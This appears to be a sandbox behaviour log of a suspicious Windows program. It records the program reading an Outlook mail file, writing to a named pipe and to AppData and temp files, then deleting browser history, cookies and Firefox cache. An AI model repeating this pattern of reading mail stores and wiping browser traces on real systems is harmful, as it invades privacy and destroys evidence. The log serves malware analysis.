Read \\.\pipe\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299} size = 0, size_out = 0 False 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 4, size_out = 4 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 1, size_out = 1 True 2
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 8, size_out = 8 True 5
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 512, size_out = 512 True 16
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 3156, size_out = 3156 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 448, size_out = 448 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 140, size_out = 140 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 566, size_out = 566 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 450, size_out = 450 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 562, size_out = 562 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 458, size_out = 458 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 594, size_out = 594 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 112, size_out = 112 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 128, size_out = 128 True 2
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 846, size_out = 846 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 724, size_out = 724 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 902, size_out = 902 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 120, size_out = 120 True 2
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 118, size_out = 118 True 2
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 108, size_out = 108 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 110, size_out = 110 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 148, size_out = 148 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 180, size_out = 180 True 1
Read C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst size = 162, size_out = 162 True 1
Read - size = 12, size_out = 12 True 1
Read - size = 96, size_out = 96 True 1
Write - size = 12 True 7
Write \\.\pipe\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299} size = 12 True 1
Write C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{25E2F79F-402D-9FBF-7229-7443C66DE827}\01D4756785E0F97F09 size = 96 True 1
Write C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin size = 80 True 1
Write C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin size = 30 True 1
Write C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin size = 24 True 1
Write C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin size = 22 True 1
Delete Directory C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018110620181107 - True 1
Delete Directory C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\History\History.IE5 - True 1
Delete Directory C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\History\Low\History.IE5 - True 1
Delete Directory C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\History\Low - True 1
Delete Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\chrome\idb\2918063365piupsah.files - True 1
Delete Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\chrome\idb - True 1
Delete Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\chrome - False 1
Delete Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\journals - True 1
Delete Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files - True 1
Delete Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb - True 1
Delete Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home - False 1
Delete Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent - False 1
Delete Directory C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\doomed - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\History\desktop.ini - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\History\History.IE5\container.dat - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018110620181107\container.dat - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\History\Low\History.IE5\container.dat - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\2XBM2EDN.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\8489XH4E.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\B4K109K7.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\B67M68H4.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\OOUVZSZN.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\TIGZFGLM.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\XNW1G0SM.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\0GHTMU6X.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\0MDKR34W.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\0Z1JIEVI.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\16DOE15M.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\16Y0X4V7.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\1L3KU69N.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\1LFQZEOH.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\1LLUY7B7.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\1UYN2RFY.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\23JC2UTD.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\2EQ4E2OJ.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\2HYILE1O.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\3RW4K76X.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\3VVSZ2CO.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\4MN240WN.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\4O6583I0.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\4YWCPPXN.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\4Z6UDYLY.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5AFMRGRY.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5ARQYMIV.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5AV8L20N.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5NWXN3UI.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5STJ6NZL.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5TAY54V0.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\5WQEGNKI.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\66I0OJL8.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\80J4IH0Y.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\8FFCGS26.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9ABR37NL.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9IJPMFHZ.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9M7ZHW1Q.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9XACNSYG.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\9Z1Y5ICI.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\A0RK8A2H.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\AA2IJ7JU.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\B427TFXJ.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\BK4HNAZ1.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\CC7DS78R.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\CDGOWO27.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\CYHYO8JD.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\D9QO3KHK.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\DN8YUCVA.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\DQI7WAG8.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\DRDF2EZX.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\E2KPI4ZI.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\E978TFRK.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\F68MFAMN.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\FCGXHIFT.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\FGTTES1V.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\FLTMVY1F.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\FOLSAQT6.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\GXB342YS.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\H5LCJX1B.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\HBPP9XXY.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\HF8F6LU0.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\HTVL5WIW.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\ILF13HLB.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\ISTFXHHR.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\ITD4OUAR.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\J4JSQG9R.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\JQOCYKOH.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\JWFWLAYR.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\K8249Y1G.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\KNJ4AJDH.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\L78EW25D.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\LC10XEWL.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\LVARU12Y.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\LY1NFEKN.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\LY3FDU65.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\M19117WZ.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MA5WDFBR.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MBJX4MYA.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MCAKE788.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MIL4MU1S.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MM8KB9U2.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MMPF10F4.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\MOE7DCQU.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\NEHE4KDB.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\NOCAHPZ6.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\NYCCG1AV.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\O8FFFI2K.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\P778SMC9.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\PF9HBAFQ.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\PK3I34UV.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\QUMCK8L4.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\RAYRHE6Z.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\RQK5QF4L.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\RTEPN67M.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\RYK7X1K4.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\S0EK69P5.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\SEVCUJM3.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\STGOZ493.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\T1LCPPSA.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\TCXQPY9L.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\TEW946CI.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\TFCJHLEI.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\U2OYIS47.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\U8FCPAKJ.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\UBUPNOZC.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\UBXQG39X.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\UGL14QS0.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\UUEVXDWP.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\V7NNCJHO.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\VD3GM2DA.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\WPEXKTDV.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\WUT8M1Q8.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\WX75TEOR.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\XRS5D0N2.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\XUAUK5R0.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\Y1I415YS.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\Y3XU5OKR.txt - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\1 - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\00230E843D3A08B230E933E226DB601D643BC852 - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\00396519A728CAF55BA5985F2822E3CD29D0B17E - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0070686314FCF810B3CEE062939E2805C4894837 - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\01936D44B3D7F728EFEB4C28574EF44AB7260A17 - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\01CC9F4D43A947CA6202BA62A7FFF28C6881C1BF - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\01D69525274B61DE5FF860EF9BDF5BEDBB7E52C6 - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\023DB71E21A04D5A6CE60A1EC2C15A40BE00DD08 - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\02556929CF2E7913AF6E896368676F9BEC324DF4 - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\025E6C3190211A09D15D92E5656FB71220B7737E - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0396D4FE028249B03B952ECAC5BDC2698D7AC41D - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\04407A80544B9CDDB0BF74A9C5090D338DED55E6 - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\04825B72BD3FF3B25000EE8B3660F3E1748CF56D - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\04DDA15772BB1EBE40F174D3D0AD961AB0D85881 - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\04E42D40E9FF818034B152EBBD5D2648E474B06E - True 1
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\053023C6ABE9799C7CBA3D16BB67C1B7F7B0D8A0 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\062AD3657B516BAF21B6D366104D405078541BA6 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\073B56D883E94B03370493A96DF99C2B51FB3E9D - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0782E7F698BE212FDCB80D8DE2C97C611AE50DFF - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\085CFB45496B3087ABCB8ABD8529B3EB41D17C27 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0A1144B8734850F5325AA6C259041EA8A201062C - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0A774848D5BE9E32A6789642784FD4DAFCD580F5 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0A9B36C9F5BCA2621C56BD4B714A9141238CF27D - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0ADCF0E2A022CEDF8D199ED2889DB295128C4E25 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0B55D23F82EE119DC0472267436CD5F2868E3B14 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0BCD5C644E4A81783F24DB39416D1CE0CA0C3015 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0CFEB549E537F8B2151A62BA069AE7A6D363BB90 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0D1B36E62742C7776D68B1240296D02DFD6478FF - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0D83D658A0C069047F6B9FD30BFDEDD80863B5F0 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0E030AE41B2AB97664B455929A8A0721BA5D1F69 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0E331C2EF53B5C952B79B038C00588087D45A128 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0EC55DA246CC743C7EEA604EB85A206384B78D8F - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0EFA10E4516ACC80858411CA65A3CFF2B1AB347D - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0FCD257674B1DEC53E0617114C11061F0395BE84 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\0FEE7E531224DDC68090378EA0DD267E4A43A052 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\10242BACB3A923DC9924A5B41FC879A31AF03963 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\102DC0B203B92AE5ADA25E34CEB5788226CA2769 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\102E001FB34D784FBF727701C7932E3FC58AF45D - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\108573E2B07FF25FFCAFE37F58D375561A47424D - True 1
Fn
